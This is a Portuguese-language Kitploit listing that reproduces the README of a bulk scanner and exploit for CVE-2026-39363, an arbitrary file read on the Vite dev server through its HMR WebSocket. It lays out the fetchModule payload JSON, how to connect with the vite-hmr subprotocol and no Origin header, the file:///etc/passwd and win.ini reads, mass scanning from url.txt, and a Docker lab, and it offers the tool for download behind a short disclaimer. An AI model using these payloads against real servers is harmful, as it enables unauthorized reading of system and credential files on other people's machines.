Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-39363 — Scanner de vulnerabilidades em lote para CVE-2026-39363 no servidor de desenvolvimento Vite, explorando a bypass de validação de origem do WebSocket para ler arquivos arbitrários via fetchModule com o protocolo file://. | Kitploit
Ferramentas/GitHubGitHub/f4s1on/cve-2026-39363
Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubf4s1on/cve-2026-39363

CVE-2026-39363

Scanner de vulnerabilidades em lote para CVE-2026-39363 no servidor de desenvolvimento Vite, explorando a bypass de validação de origem do WebSocket para ler arquivos arbitrários via fetchModule com o protocolo file://.

Ver Repositório
10há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-39363 — Leitura Arbitrária de Arquivos via WebSocket do Vite Dev Server (Detecção em Massa)

Aviso Legal: Esta ferramenta destina-se exclusivamente a testes de segurança autorizados e pesquisa educacional. O usuário deve cumprir as leis e regulamentos locais; a varredura ou o ataque a sistemas de terceiros sem autorização é ilegal. O autor não se responsabiliza por qualquer uso indevido.

Descrição da Vulnerabilidade

O WebSocket HMR do servidor de desenvolvimento Vite (6.0.0 ~ 6.4.1, 7.0.0 ~ 7.3.1, 8.0.0 ~ 8.0.4) não valida o cabeçalho Origin. Um atacante pode invocar fetchModule por meio do evento vite:invoke, usando o protocolo file:// combinado com o parâmetro ?raw para contornar a restrição server.fs.allow e ler arquivos arbitrários do servidor.

Fluxo de Detecção

url.txt → http://host:port
  ↓ analisa host + port
  ↓
┌─ Etapa 1: tenta ws://host:porta informada
│  ├─ Handshake WebSocket bem-sucedido + exploit bem-sucedido → vulnerável
│  └─ falha → se a porta informada == 5173 → não vulnerável
│
└─ Etapa 3: verifica host:5173 (somente se a porta informada ≠ 5173)
   ├─ porta fechada → não vulnerável
   └─ porta aberta → handshake WebSocket + exploit na porta 5173
        ├─ sucesso → vulnerável
        └─ falha → não vulnerável

Como Usar

Instalar Dependências

pip install -r requirements.txt

Ativar e Desativar o Proxy

Para ativar o proxy, basta descomentar as linhas 26-27 do script

# Para ativar o proxy, descomente as duas linhas abaixo e defina o endereço e a porta corretos do proxy
# os.environ["HTTP_PROXY"] = "http://127.0.0.1:8083"
# os.environ["HTTPS_PROXY"] = "http://127.0.0.1:8083"

Preparar os Alvos

Escreva as URLs dos alvos em url.txt, uma por linha:

http://192.168.1.100:5173
http://example.com
http://target.cn:8080

Executar

python cve_2026_39363.py

Saída

Terminal:

[*] Loaded 3 URL(s), scanning with 3 thread(s)...

http://192.168.1.100:5173 存在漏洞 (Linux)
http://example.com 存在漏洞 (Linux)
http://target.cn:8080 不存在漏洞

[*] Done. 2/3 vulnerable, elapsed 3.2s
[*] Results saved to result.txt

result.txt:

http://192.168.1.100:5173 (Linux)
http://example.com:5173 (Linux)

Cada linha contém o tipo de POC (Linux / Windows), identificando as características do arquivo lido com sucesso.

Arquivos de Verificação do POC

Sistema AlvoArquivo LidoMarcador de Característica
Linuxfile:///etc/passwd?rawroot:
Windowsfile:///C:/Windows/win.ini?rawfor 16-bit app support

Payload do Exploit

Suporta dois formatos de payload (tentados em ordem):

  1. Formato Vulhub PoC: {"id":"send:0","name":"fetchModule","data":[file_path]}
  2. Formato RPC interno: {"fn":"fetchModule","args":[file_path]}

Parâmetros-chave do WebSocket

ParâmetroValorMotivo
Subprotocolovite-hmrRequisito do WebSocket HMR do Vite
OriginSupressão de envio (suppress_origin=True)O Vite rejeita conexões não-navegador com cabeçalho Origin

Teste no Ambiente Vulnerável com Docker

# Iniciar
docker run -d --name vite-vuln -p 5173:5173 vulhub/vite:7.3.1

# Escanear
echo "http://127.0.0.1:5173" > url.txt
python cve_2026_39363.py

# Limpar
docker stop vite-vuln && docker rm vite-vuln

Perguntas Frequentes

P: Todas as verificações retornam "não vulnerável"?

  • Confirme se a porta 5173 do alvo está aberta
  • Confirme se o Vite dev server está exposto à rede usando --host ou server.host
  • Confirme se o WebSocket não está desabilitado por server.ws: false

P: Saída com caracteres corrompidos no Windows?

  • O script já trata isso automaticamente; se o problema persistir, confirme se o terminal está codificado em UTF-8

P: O url.txt gerado pelo PowerShell não pode ser analisado?

  • O script usa utf-8-sig para ignorar automaticamente o BOM
Baixar ferramenta